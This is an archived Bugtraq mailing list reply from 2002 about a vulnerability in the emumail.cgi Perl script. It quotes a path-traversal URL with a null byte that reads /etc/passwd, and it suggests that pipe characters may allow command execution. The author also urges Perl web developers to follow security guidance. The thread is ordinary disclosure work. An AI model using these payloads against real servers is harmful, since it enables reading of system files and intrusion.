Bugtraq mailing list archives

Re: emumail.cgi

From: merlyn () stonehenge com (Randal L. Schwartz)
Date: 09 Apr 2002 12:14:17 -0700

"MegaHz" == MegaHz  <admin () cyhackportal com> writes:


MegaHz> u can also do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../etc/passwd%00

MegaHz> but u cannot do this:
MegaHz> http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00

It's Perl, so I bet they didn't check for pipe symbols at the
beginning and ending either.  That can launch things.

I wish people who write Perl code for the net would at *least* read
the Perl Web Security FAQ *at a minimum*, or hire an outside Perl
company (like Stonehenge :) to vet the code.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
<merlyn () stonehenge com> <URL:http://www.stonehenge.com/merlyn/>
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

Current thread:

emumail.cgi acidneo (Apr 04)
- Re: emumail.cgi Tom Micklovitch (Apr 05)
- Re: emumail.cgi, one more local vulnerability (not verified) Leif Jakob (Apr 10)
- <Possible follow-ups>
- Re: emumail.cgi N|ghtHawk (Apr 05)
  - Re: emumail.cgi MegaHz (Apr 08)
    - Re: emumail.cgi Randal L. Schwartz (Apr 09)